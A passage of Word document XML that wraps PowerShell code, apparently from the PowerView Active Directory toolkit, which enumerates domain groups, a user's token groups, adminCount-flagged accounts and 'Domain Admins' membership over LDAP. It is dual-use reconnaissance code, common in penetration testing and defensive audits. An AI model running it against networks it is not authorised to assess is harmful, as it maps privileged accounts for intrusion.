    <w:p w14:paraId="2EF62355" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33B65117" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451B7B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E01076B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08869979" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA6557" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE7ECA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FE2F075" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FB9FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FEA739" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51623C34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AC7287" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B28481" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05920C14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE60C1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6BC538" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4379EBE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375AFE37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $AdminCount,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D757E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3853FD2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09249366" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3760AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7684EEFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D162CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RawSids,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC885A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5ABB3094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43755B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $AllTypes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA0ADC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B7F7BDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BF438B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F142B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405AC4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08B021C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B8E6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63D6F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773ACD18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25DB0C3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70E64F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09404B5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if (!$AllTypes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02978FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B704488" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">          $Filter += "(groupType:1.2.840.113556.1.4.803:=2147483648)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01D6F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0D673" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07500021" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23219954" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B03ECDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($GroupSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A25005" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DE4AE14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($AdminCount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6FC13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Checking for adminCount=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76313154" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(admincount=1)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E47D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68570BB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E68B0E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($UserName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156CCA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get the raw user object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F61AEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $User = Get-ADObject -SamAccountName $UserName -Domain $Domain -DomainController $DomainController -Credential $Credential -ReturnRaw -PageSize $PageSize | Select-Object -First 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173E465" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="460DB88E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($User) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176DEC77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # convert the user to a directory entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1552A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $UserDirectoryEntry = $User.GetDirectoryEntry()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20104D60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C750FA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # cause the cache to calculate the token groups for the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E640DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $UserDirectoryEntry.RefreshCache("tokenGroups")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952B41A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14D4192C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $UserDirectoryEntry.TokenGroups | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D66AA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # convert the token group sid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C64EF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCFA8A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6285E97B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # ignore the built in groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465AF338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($GroupSid -notmatch '^S-1-5-32-.*') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A317586" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467668C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Group = Get-ADObject -SID $GroupSid -PageSize $PageSize -Domain $Domain -DomainController $DomainController -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E5EA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Group.PSObject.TypeNames.Add('PowerView.Group')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A11324" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B681EF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24782612" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3059598E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if($RawSids) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD6E55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $GroupSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E933C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C335569" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58609D92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    Convert-SidToName -SID $GroupSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89D0C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1ACA2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA9ABA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709EB9F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145053BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8E61A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329063FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Warning "UserName '$UserName' failed to resolve."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858B401" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE7510" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DDB378" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AAF19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($SID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C4E3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.filter = "(&amp;(objectCategory=group)(objectSID=$SID)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B325340" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B096F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C5DF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.filter = "(&amp;(objectCategory=group)(samaccountname=$GroupName)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACDBD93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE7929" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04AADBAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $GroupSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA8E7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8F094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if we're returning full data objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D324D30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7E1CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582EA4F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Group = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B0DEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Group.PSObject.TypeNames.Add('PowerView.Group')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1ABB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B55FED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2DD5C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EDC20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # otherwise we're just returning the group name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FFB79A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.properties.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B337212" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC28A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA08249" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2E87C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8DBF34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED05C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403A5F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02EC8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3954FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="247DFBC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1030A590" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetGroupMember {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C357E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACF4BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51361249" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22685EA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function users [ADSI] and LDAP to query the current AD context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1902ED61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or trusted domain for users in a specified group. If no GroupName is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20596022" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        specified, it defaults to querying the "Domain Admins" group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC9AD2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This is a replacement for "net group 'name' /domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705735D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47276C5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74DA64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73EB076A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The group name to query for users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A886C97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7EBA92BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569BDA69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
